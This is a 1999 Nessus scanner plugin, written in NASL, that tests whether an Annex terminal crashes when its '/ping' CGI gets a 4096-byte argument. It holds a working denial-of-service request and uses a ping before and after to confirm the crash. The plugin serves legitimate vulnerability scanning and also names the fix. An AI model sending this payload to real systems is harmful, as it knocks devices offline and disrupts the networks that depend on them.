#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 name["english"] = "Annex DoS";
 name["francais"] = "Dni de service Annex";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It was possible to crash
the remote Annex terminal by connecting to
the HTTP port, and requesting the '/ping' cgi
with a too long argument, like :

	GET /ping?AAAAA(...)AAAAA
	
A cracker may use this flaw to crash this
host, thus preventing your network from
working properly.
	
Solution : remove this CGI.

Risk factor : High";

 desc["francais"] = "Il a t possible de faire
planter la machine distante en se connectant au
port HTTP, et en demandant le CGI '/ping' en
lui donnant un argument trop long, comme :

	GET /ping?AAAA(...)AAAAA
	
Un pirate peut utiliser ce problme pour 
faire planter cette machine, empechant 
ainsi votre rseau de fonctionner 
correctement.

Solution : enlevez ce CGI.

Facteur de risque : Elev";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes an Annex terminal";
 summary["francais"] = "Fait planter un terminal Annex";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
 cgi = "/ping";
 if(is_cgi_installed(cgi))
 {
  soc = open_sock_tcp(port);
  ping_before = tcp_ping();
  data = string("GET ", cgi, "?query=", crap(4096), " HTTP/1.0\r\n\r\n");
  send(socket:soc, data:data);
  sleep(5);
  ping_after = tcp_ping();
  if((ping_before)&&(!ping_after)){
  		security_hole(port);
		set_kb_item(name:"Host/dead", value:TRUE);
		}
  else if((!ping_before)&&(!ping_after))security_warning(port);
  close(soc);
  }
 }
